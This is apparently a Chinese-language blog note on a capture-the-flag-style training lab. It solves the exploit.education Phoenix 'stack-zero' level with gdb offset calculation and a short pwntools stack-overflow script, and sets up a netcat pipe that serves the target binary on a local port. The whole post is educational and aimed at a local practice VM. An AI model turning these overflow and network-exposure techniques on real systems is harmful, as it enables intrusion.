Sorry, your browser cannot access this site
This page requires browser support (enable) JavaScript
Learn more >

找到一个学习pwn的项目http://exploit.education ,决定让我临时抱佛脚学的pwn走向正轨,试试开个笔记系列(每次pwntools脚本都忘记怎么写),希望不要半路弃坑。定个小目标,至少把Phoenix系列做完吧。

环境配置

首先在more-downloads里下载phoenix的虚拟机系统镜像,根据你的架构选择。这就是靶机。在启动之前,我们需要安装qemu-system-x86 (64位的也在同一个包里(archlinux))

运行boot-balabala.sh启动虚拟机,默认在2222端口开启ssh。用户名和密码都是user。

如果你想使用netcat来转发里面的程序,只需在启动脚本里添加另一个端口转发,这里放网络那一整行为例。

-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333

然后在虚拟机里执行

mkfifo io

并创建一个脚本文件(start.sh

#!/bin/bash
cat io|$1 -i 2>&1|nc -l 3333 > io

然后你就可以通过sh start.sh /opt/phoenix/amd64/stack-zero 这样的方式来开netcat了,端口3333记得要和启动脚本里的匹配。

虚拟机里的gdb默认装了gef但是我不太会用,所以scp了一份peda进去。略过。

宿主机再装个非常方便的pwntools:pip install pwntools

stack-zero

程序比较简单,直接用cutter了。

深度截图_选择区域_20230215183930.png

(其实exploit.education的网页上给了源码)(开头的注释甚至是个冷笑话草草草)

我们现在要让s溢出到var_10h(changeme),内容随便。打开gdb,计算一下距离,先随便输入点什么。

Untitled

字符串在0x620这里。

Untitled

判断语句,changeme在rbp-0x10 这里也就是0x670-0x10

计算0x660-0x620=0x40

那么我们只要输出0x41个a即可

为了练习使用pwntools,写个代码。

这里直接用ssh连了,nc都不需要。

from pwn import *

shell = ssh("user", "localhost", password="user", port=2222)
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())
sh.sendline(b"a"*0x41)
print(sh.recvline())
shell.close()

成功

Untitled

评论